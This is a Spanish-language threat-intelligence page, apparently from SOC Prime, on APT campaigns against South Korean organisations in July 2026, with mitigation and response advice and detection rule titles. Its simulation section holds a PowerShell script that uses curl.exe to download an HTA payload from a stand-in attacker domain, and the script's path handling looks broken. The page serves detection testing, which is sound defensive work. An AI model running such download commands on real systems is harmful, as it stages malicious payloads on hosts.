SOC Prime Bias: Critical

31 Aug 2026 06:13 UTC

Informe de Amenazas APT en Corea del Sur: Tendencias de Julio 2026

Author Photo
SOC Prime Team linkedin icon Seguir
Informe de Amenazas APT en Corea del Sur: Tendencias de Julio 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

AhnLab informa un aumento en la actividad APT dirigida a organizaciones surcoreanas a través de campañas de spear-phishing. Los ataques se basan principalmente en archivos LNK maliciosos para entregar cargas útiles, incluidos scripts de PowerShell, scripts de AutoIt y puertas traseras. Las técnicas comunes incluyen persistencia a través de Programador de Tareas y exfiltración de datos a través de servicios como Dropbox y PubNub.

Investigación

La investigación se centró en la infraestructura APT utilizada contra entidades surcoreanas a lo largo de julio de 2026. Los analistas agruparon la actividad en varios tipos de ataques, de la A a la G, basados en métodos de entrega y características funcionales. Los investigadores también identificaron comportamientos como el DLL side-loading y el abuso de utilidades nativas de Windows como curl.exe para la recuperación de cargas útiles.

Mitigación

Los usuarios deben verificar las identidades de los remitentes y evitar abrir archivos adjuntos recibidos de fuentes desconocidas o no confiables. Las organizaciones deben mantener los sistemas operativos y navegadores web actualizados con los últimos parches de seguridad. También se recomienda mantener actualizadas las soluciones antivirus y de protección de endpoints, como V3.

Respuesta

Si se detectan archivos LNK sospechosos o entradas no autorizadas en el Programador de Tareas, los respondedores de incidentes deben aislar inmediatamente el host afectado. Se debe realizar un análisis forense de memoria para identificar puertas traseras inyectadas o DLLs maliciosos. También se deben revisar los registros de la red en busca de conexiones salientes inusuales a servicios de alojamiento de archivos o canales de comando y control como PubNub.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Comportamiento de Evasión de Defensa MSHTA LOLBAS Sospechoso mediante Detección de Comandos Asociados (a través de process_creation)

Equipo SOC Prime
28 Ago 2026

Uso Sospechoso de CURL (a través de cmdline)

Equipo SOC Prime
28 Ago 2026

Tarea Programada Sospechosa (a través de auditoría)

Equipo SOC Prime
28 Ago 2026

Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios de Terceros / Herramientas (a través de proxy)

Equipo SOC Prime
28 Ago 2026

Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios de Terceros / Herramientas (a través de dns)

Equipo SOC Prime
28 Ago 2026

IOCs (HashMd5) para detectar: Informe de Tendencias de Amenazas de Julio 2026 sobre Ataques APT (Corea del Sur)

Reglas de IA de SOC Prime
28 Ago 2026

Curl.exe usado para Descargar y Ejecutar Archivos Maliciosos [Windows Sysmon]

Reglas de IA de SOC Prime
28 Ago 2026

Detectar Comandos Maliciosos de PowerShell dentro de Archivos LNK [Windows Powershell]

Reglas de IA de SOC Prime
28 Ago 2026

Ejecución de Simulación

Prerequisito: El Chequeo Previo de Telemetría y Línea de Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica adversaria (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntan a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: El adversario intenta usar curl.exe para descargar un archivo HTA malicioso en el %TEMP% directorio para establecer una base. Para probar si la lógica de detección actual está funcionando (ya que busca específicamente las palabras «download» o «execute»), el atacante usará una línea de comandos que incluya explícitamente estas palabras como parte de un argumento falso o descripción, simulando un script mal construido o un intento específico de imitar el patrón que el SOC está buscando.

  • Script de Prueba de Regresión:

     # Simular un adversario usando curl con las palabras clave específicas requeridas por la regla
      $tempPath = $env:TEMPmalicious.hta
      $url = "http://dominio-controlado-por-atacante.com/payload.hta"
    
      # Este comando está diseñado específicamente para activar la lógica de 'contiene' de la regla
      # al incluir las palabras 'download' y 'execute' en la cadena de línea de comandos.
      Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'"
  • Comandos de Limpieza:

     # Eliminar el archivo temporal creado durante la simulación
      if (Test-Path "$env:TEMPmalicious.hta") {
          Remove-Item -Path "$env:TEMPmalicious.hta" -Force
      }